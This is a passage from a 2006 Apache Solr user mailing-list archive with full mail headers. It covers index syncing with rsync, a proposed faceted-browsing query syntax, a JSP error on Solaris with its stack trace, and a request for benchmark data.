required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 10:49:05 -0800 Received: by pproxy.gmail.com with SMTP id d42so218074pyd for <[email protected]>; Wed, 29 Mar 2006 10:48:44 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=B2o0tYIR7Wx9kxIn6X5Gi8TX21c9q/um1kH9cAhK+uIz5umX1zsZzmKdXwPwYwyuNaVqVFhygzwZfXJ8GHchFPAnjWe8Ia4PFkyl0DDFirkxFpj9UUg/4OfB8qPGKvGF3oxSiqxBnjbRuHrpIVGFmmr/RZYG1EWR2df7F2PCnvU= Received: by 161.129.204.104 with SMTP id g20mr415272pyk; Wed, 29 Mar 2006 10:48:44 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 29 Mar 2006 10:48:44 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 13:48:44 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected], "jason rutherglen" <[email protected]> Subject: Re: Rsync In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/29/06, jason rutherglen <[email protected]> wrote: > Perhaps a future project to increase the speed of the syncing to sub-minu= te times. Sounds like two files will change, in addition to segment files = being added. Is this correct? Or maybe other pieces such as cache reloadi= ng would make this more difficult. rsync will only copy over the changed index files, not the whole index each time. -Yonik From [email protected] Wed Mar 29 18:50:34 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74875 invoked from network); 29 Mar 2006 18:50:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 18:50:33 -0000 Received: (qmail 1114 invoked by uid 500); 29 Mar 2006 18:50:32 -0000 Delivered-To: [email protected] Received: (qmail 1054 invoked by uid 500); 29 Mar 2006 18:50:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1045 invoked by uid 99); 29 Mar 2006 18:50:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 10:50:32 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 10:50:31 -0800 Received: by pproxy.gmail.com with SMTP id i49so206055pyi for <[email protected]>; Wed, 29 Mar 2006 10:50:10 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=uFVpLGx6uRU49tnZO4O9RNaywwYOyVn4AH9V4lRLFfGS/pEXRAGEjK0dKfgPRM5naKw5gNOf3iTIIX1RnlnTuIs2LS8vqQlKh4VRJGSLb0yT18jceOTQs8mDF3ppLklS78DV2UexviHze5TLeM0vISPLrfZlt3PPMrURXPWa0kc= Received: by 161.129.204.104 with SMTP id h18mr954527pym; Wed, 29 Mar 2006 10:50:10 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 29 Mar 2006 10:50:10 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 13:50:10 -0500 From: "Clay Webster" <[email protected]> To: [email protected] Subject: Re: faceted browsing In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_5296_30855126.1143658210483" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_5296_30855126.1143658210483 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline How could faceted browsing be accomplished without [Chris's] metadata documents? --cw On 3/29/06, Yonik Seeley <[email protected]> wrote: > > Solr has a lot of support to do faceted browsing, but one must > currently write a custom query handler to implement the faceting > logic. > > The support includes: > - custom query handlers: > - the ability to return more data than just a list of documents > - a filter cache with autowarming, for fast access to the filter for > each facet > - more memory efficient and faster intersecting filter representations > > The part I want in the future is simple faceted browsing without > having to write any plugins or Java code.. so we need to come up with > a syntax to represent the desired faceting operations, and then > implement that syntax in the standard request handler. > > To implement a custom query handler, you need to implement > SolrRequestHandler > > http://incubator.apache.org/solr/docs/api/org/apache/solr/request/SolrReq= uestHandler.html > and register it in solrconfig.xml > > -Yonik > > On 3/29/06, Erik Hatcher <[email protected]> wrote: > > I saw Yonik mentioned faceted browsing as something coming in the > > future of Solr, but I had thought it was one of the initial features > > from seeing this announcement ages ago: > > > > <http://www.nabble.com/Announcement%3A-Lucene-powering-CNET.com= - > > Product-Category-Listings-t266441.html#a748420> > > > > If facets are part of the current Solr codebase, how are they > > configured and returned in the response? > > > > If they aren't currently possible with Solr, what would it take to > > implement it? > > > > I'm still, obviously, just scratching the surface of Solr as I > > evaluate it for replacing my custom XML-RPC based search server which > > does rudimentary facets using Filters and BitSet operations. > > > > By faceted browsing, a Query is used to search, Hits are returned, > > but also based on a subset of the fields (indexed, untokenized > > fields) the number of documents in each of these "facet" fields is > > returned as well to show counts by each facet. > > > > Thanks, > > Erik > > > ------=_Part_5296_30855126.1143658210483-- From [email protected] Wed Mar 29 19:30:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98261 invoked from network); 29 Mar 2006 19:30:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 19:30:30 -0000 Received: (qmail 77075 invoked by uid 500); 29 Mar 2006 19:30:30 -0000 Delivered-To: [email protected] Received: (qmail 77060 invoked by uid 500); 29 Mar 2006 19:30:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77049 invoked by uid 99); 29 Mar 2006 19:30:30 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 11:30:30 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 11:30:29 -0800 Received: by pproxy.gmail.com with SMTP id b36so866341pyb for <[email protected]>; Wed, 29 Mar 2006 11:30:08 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=b75lcAMeFIZeAzqeXGb+Fd7kq/KpnlmpbjOcj5hD7FQACdEL/RN5ljEfuaojs0A3n8Fp7okwNkf1mUtipIMxIkOgJ026bcZhRNPljmnX6MrzmfsehfZf6yEgj2OL83BMp84YblMcqoMCrepMSe6Nu0YCAIqwRasTrFKX0C+GiaQ= Received: by 161.129.204.104 with SMTP id x17mr1143968pyk; Wed, 29 Mar 2006 11:30:07 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 29 Mar 2006 11:30:07 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 14:30:07 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: faceted browsing In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/29/06, Clay Webster <[email protected]> wrote: > How could faceted browsing be accomplished without [Chris's] metadata > documents? The most basic form: consider if a field called "category" existed on each document. You could then ask for the counts of the top 10 values in category field for all of the documents matching a query. Possible syntax: my user query; groupByField(category,10) Another form would require the user to enumerate the facets... this would work well for things like price ranges: Possible syntax: my user query; groupByQueries(price:[0 TO 10}, price:[10 TO 100}, price:[100 TO 1000}) And of course, one would want to be able to specify them all in a single qu= ery: my user query; groupByField(category,10), groupByField(author,20), groupByQueries(price:[0 TO 10}, price:[10 TO 100}, price:[100 TO 1000}) The thing that Chris' metadata documents also did was tell you *what* facets to do, but that logic could also be kept in the client.=20 Standardizing that is probably currently beyond the scope of what we could put in the standard request handler. -Yonik From [email protected] Wed Mar 29 22:07:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88570 invoked from network); 29 Mar 2006 22:07:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 22:07:06 -0000 Received: (qmail 13771 invoked by uid 500); 29 Mar 2006 22:07:02 -0000 Delivered-To: [email protected] Received: (qmail 13707 invoked by uid 500); 29 Mar 2006 22:07:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13696 invoked by uid 99); 29 Mar 2006 22:07:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 14:07:02 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: 161.129.204.104 is neither permitted nor denied by domain of [email protected]) Received: from [161.129.204.104] (HELO electron.ushmm.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 14:07:01 -0800 Received: from [161.129.204.104] ([161.129.204.104]) by electron.ushmm.org (8.13.1/8.13.1) with ESMTP id k2TM1oV7015504 for <[email protected]>; Wed, 29 Mar 2006 17:02:10 -0500 (EST) Message-ID: <[email protected]> Date: Wed, 29 Mar 2006 17:06:10 -0500 From: Michael Levy <[email protected]> Reply-To: [email protected] User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Solr admin page error on Solaris Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, Just trying to get Solr running. I can run it OK on my Windows machine as per the tutorial. However, on my Solaris machine I'm having trouble. My newly-installed Tomcat is running the various examples, seems to be running OK. Running: Tomcat version 5.5.16 Java version 1.5.0_06-b05 Running Solaris 5.9 on sparc I put last night's solr.war file in webapps and it shows up OK in Tomcat manager and admin. I then pointed my browser to http://mydomain:8080/solr/admin/ and the resulting page looks like below. Any help appreciated, thanks! org.apache.jasper.JasperException: Exception in JSP: /admin/_info.jsp:7 4: <!-- $Name: $ --> 5: 6: <%@ page import="java.util.Date"%> 7: 8: <!-- jsp:include page="header.jsp"/ --> 9: <!-- do a verbatim include so we can use the local vars --> 10: <%@include file="header.jsp" %> Stacktrace: org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:504) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:375) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) *root cause* javax.servlet.ServletException org.apache.jasper.runtime.PageContextImpl.doHandlePageException(PageContextImpl.java:858) org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImpl.java:791) org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:262) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:97) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:332) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) *root cause* java.lang.NoClassDefFoundError org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:67) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:97) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:332) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) From [email protected] Wed Mar 29 23:16:49 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26807 invoked from network); 29 Mar 2006 23:16:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2006 23:16:45 -0000 Received: (qmail 22980 invoked by uid 500); 29 Mar 2006 23:16:32 -0000 Delivered-To: [email protected] Received: (qmail 22918 invoked by uid 500); 29 Mar 2006 23:16:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22909 invoked by uid 99); 29 Mar 2006 23:16:31 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 15:16:31 -0800 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=SPF_SOFTFAIL X-Spam-Check-By: apache.org Received-SPF: softfail (asf.osuosl.org: transitioning domain of [email protected] does not designate 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO Circe.local) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 29 Mar 2006 15:16:31 -0800 Received: from [161.129.204.104] (localhost [161.129.204.104]) by Circe.local (Postfix) with ESMTP id 227301B114D for <[email protected]>; Thu, 30 Mar 2006 10:15:56 +1100 (EST) Mime-Version: 1.0 (Apple Message framework v749.3) Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed To: [email protected] From: Ian Holsman <[email protected]> Subject: Large test lucene DB to use with a SolR benchmark Date: Thu, 30 Mar 2006 10:15:55 +1100 X-Mailer: Apple Mail (2.749.3) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi. I'd like to do a benchmark on how SolR performs on the new Sun T2000 hardware (compared to a x86-64) machine (why? I'm trying to get the HW for free ) check out http://sunfirefan.com for more details). but in order to do this I need a lucene db to test against. does any one know of a publicly available production size database which I can use? otherwise I will generate something off dmoz or randomly. regards Ian. -- Ian Holsman Zilbo.com / 220.874.0790 USA/ 220.874.0790 Australia A good hockey player plays where the puck is. A great hockey player plays where the puck is going to be. -- Wayne Gretzky From [email protected] Thu Mar 30 14:58:34 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9122 invoked from network); 30 Mar 2006 14:58:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2006 14:58:33 -0000 Received: (qmail 94117 invoked by uid 500); 30 Mar 2006 14:58:33 -0000 Delivered-To: [email protected] Received: (qmail 94083 invoked by uid 500); 30 Mar 2006 14:58:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94061 invoked by uid 99); 30 Mar 2006 14:58:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Mar 2006 06:58:32 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Mar 2006 06:58:31 -0800 Received: by pproxy.gmail.com with SMTP id f25so862757pyf for <[email protected]>; Thu, 30 Mar 2006 06:58:10 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=HL1cNWrzVeRQhpSqu8XpZD2A3p7dUpG+QOwiwHa5sYQTLZM33AsCGAi8QGloY0f5kIxDBFCVvHwWZvEIGGoBsJMf+vDx/nbEZmsW0juTUBqemqr1jAwCkg8hP4BU4euww36cG0utoHHfmnryZVxFwmkhsXVI8s1R3fkOiqg9fXU= Received: by 161.129.204.104 with SMTP id d9mr637191pyl; Thu, 30 Mar 2006 06:58:10 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 30 Mar 2006 06:58:10 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 30 Mar 2006 09:58:10 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected], [email protected] Subject: Re: Solr admin page error on Solaris In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hmmm, I just tried Tomcat 5.5.16 on Windows and the admin page comes up fin= e. I don't have a Solaris box handy, but I can try it on Linux later. Line 7 is blank... I wonder if it's some windows/unix EOL issue in jasper. -Yonik On 3/29/06, Michael Levy <[email protected]> wrote: > Hi, > > Just trying to get Solr running. I can run it OK on my Windows machine > as per the tutorial. However, on my Solaris machine I'm having > trouble. My newly-installed Tomcat is running the various examples, > seems to be running OK. > Running: > Tomcat version 5.5.16 > Java version 1.5.0_06-b05 > Running Solaris 5.9 on sparc > > I put last night's solr.war file in webapps and it shows up OK in Tomcat > manager and admin. I then pointed my browser to > http://mydomain:8080/solr/admin/ and the resulting page looks like > below. Any help appreciated, thanks! > > org.apache.jasper.JasperException: Exception in JSP: /admin/_info.jsp:7 > 4: <!-- $Name: $ --> > 5: > 6: <%@ page import=3D"java.util.Date"%> > 7: > 8: <!-- jsp:include page=3D"header.jsp"/ --> > 9: <!-- do a verbatim include so we can use the local vars --> > 10: <%@include file=3D"header.jsp" %> > > Stacktrace: > org.apache.jasper.servlet.JspServletWrapper.handleJspException(Js= pServletWrapper.java:504) > org.apache.jasper.servlet.JspServletWrapper.service(JspServletWra= pper.java:375) > org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.ja= va:314) > org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264) > javax.servlet.http.HttpServlet.service(HttpServlet.java:802) > > *root cause* > > javax.servlet.ServletException > org.apache.jasper.runtime.PageContextImpl.doHandlePageException(P= ageContextImpl.java:858) > org.apache.jasper.runtime.PageContextImpl.handlePageException(Pag= eContextImpl.java:791) > org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:262) > org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:97= ) > javax.servlet.http.HttpServlet.service(HttpServlet.java:802) > org.apache.jasper.servlet.JspServletWrapper.service(JspServletWra= pper.java:332) > org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.ja= va:314) > org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264) > javax.servlet.http.HttpServlet.service(HttpServlet.java:802) > > *root cause* > > java.lang.NoClassDefFoundError > org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:67) > org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:97= ) > javax.servlet.http.HttpServlet.service(HttpServlet.java:802) > org.apache.jasper.servlet.JspServletWrapper.service(JspServletWra= pper.java:332) > org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.ja= va:314) > org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264) > javax.servlet.http.HttpServlet.service(HttpServlet.java:802) From [email protected] Thu Mar 30 16:11:44 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86565 invoked from network); 30 Mar 2006 16:11:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2006 16:11:44 -0000 Received: (qmail 9641 invoked by uid 500); 30 Mar 2006 16:11:43 -0000 Delivered-To: [email protected] Received: (qmail 9623 invoked by uid 500); 30 Mar 2006 16:11:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9605 invoked by uid 99); 30 Mar 2006 16:11:43 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Mar 2006 08:11:43 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Mar 2006 08:11:40 -0800 Received: by pproxy.gmail.com with SMTP id f25so937196pyf for <[email protected]>; Thu, 30 Mar 2006 08:11:20 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=ANXMlu74HNc1tlasq0OAV7lWOOihUCSiY5pitYu0hVT2s2HVhwyE7yn9dW9j/24R9IcW7RTGLnvOJ05sT5EroTrCPkurhi+8X7bMa0Lt8rAxQ+Pio9fdN4DfbOmiLZ/r9q579aQYzvE5rrazQUZo+ww7oih6oO7/9ZgoC4mHR5w= Received: by 161.129.204.104 with SMTP id v10mr20017pyj; Thu, 30 Mar 2006 08:11:18 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 30 Mar 2006 08:11:18 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 30 Mar 2006 11:11:18 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: Large test lucene DB to use with a SolR benchmark In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/29/06, Ian Holsman <[email protected]> wrote: > Hi. > > I'd like to do a benchmark on how SolR performs on the new Sun T2000 > hardware (compared to a x86-64) machine (why? I'm trying to get the > HW for free ) check out http://sunfirefan.com for more details). but > in order to do this I need a lucene db to test against. > > does any one know of a publicly available production size database > which I can use? otherwise I will generate something off dmoz or > randomly. Nothing I know of... A large realistic example for benchmarking would be nice though. -Yonik From [email protected] Thu Mar 30 20:40:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47199 invoked from network); 30 Mar 2006 20:40:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2006 20:40:04 -0000 Received: (qmail 3497 invoked by uid 500); 30 Mar 2006 20:40:04 -0000 Delivered-To: [email protected] Received: (qmail 3473 invoked by uid 500); 30 Mar 2006 20:40:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3461 invoked by uid 99); 30 Mar 2006 20:40:04 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Mar 2006 12:40:04 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 30 Mar 2006 12:40:03 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 44E4F33D8C5; Thu, 30 Mar 2006 15:39:42 -0500 (EST) Received: from [161.129.204.104] (d-128-193-79.bootp.Virginia.EDU [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 5010133D8C1 for <[email protected]>; Thu, 30 Mar 2006 15:39:37 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v749.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: faceted browsing Date: Thu, 30 Mar 2006 15:39:28 -0500 To: [email protected] X-Mailer: Apple Mail (2.749.3) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Level: X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, score=-2.6 required=5.0 tests=BAYES_00 autolearn=ham version=3.0.1 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Yonik, Thanks for the recommendations. It's reassuring to know I was on the right track in realizing that a custom SolrRequestHandler was needed to accomplish this. Now I need to investigate the flexibility of the solrconfig.xml - can custom parameters be set there, such that a custom SolrRequestHandler could read them? For example, I'd want to list the field names that are the "facets", such that counts for each of those are returned with each query. Thanks, Erik On Mar 29, 2006, at 1:46 PM, Yonik Seeley wrote: > Solr has a lot of support to do faceted browsing, but one must > currently write a custom query handler to implement the faceting > logic. > > The support includes: > - custom query handlers: > - the ability to return more data than just a list of documents > - a filter cache with autowarming, for fast access to the filter for > each facet > - more memory efficient and faster intersecting filter > representations > > The part I want in the future is simple faceted browsing without > having to write any plugins or Java code.. so we need to come up with > a syntax to represent the desired faceting operations, and then > implement that syntax in the standard request handler. > > To implement a custom query handler, you need to implement > SolrRequestHandler > http://incubator.apache.org/solr/docs/api/org/apache/solr/request/ > SolrRequestHandler.html > and register it in solrconfig.xml > > -Yonik > > On 3/29/06, Erik Hatcher <[email protected]> wrote: >> I saw Yonik mentioned faceted browsing as something coming in the >> future of Solr, but I had thought it was one of the initial features >> from seeing this announcement ages ago: >> >> <http://www.nabble.com/Announcement%3A-Lucene-powering- >> CNET.com- >> Product-Category-Listings-t266441.html#a748420> >> >> If facets are part of the current Solr codebase, how are they >> configured and returned in the response? >> >> If they aren't currently possible with Solr, what would it take to >> implement it? >> >> I'm still, obviously, just scratching the surface of Solr as I >> evaluate it for replacing my custom XML-RPC based search server which >> does rudimentary facets using Filters and BitSet operations. >> >> By faceted browsing, a Query is used to search, Hits are returned, >> but also based on a subset of the fields (indexed, untokenized >> fields) the number of documents in each of these "facet" fields is >> returned as well to show counts by each facet. >> >> Thanks, >> Erik >> From [email protected] Thu Mar 30 21:07:29 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58130 invoked from network); 30 Mar 2006 21:07:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2006 21:07:29 -0000 Received: (qmail 39416 invoked by uid 500); 30 Mar 2006 21:07:29 -0000 Delivered-To: [email protected] Received: (qmail 39395 invoked by uid 500); 30 Mar 2006 21:07:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 39386 invoked by uid 99); 30 Mar 2006 21:07:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) 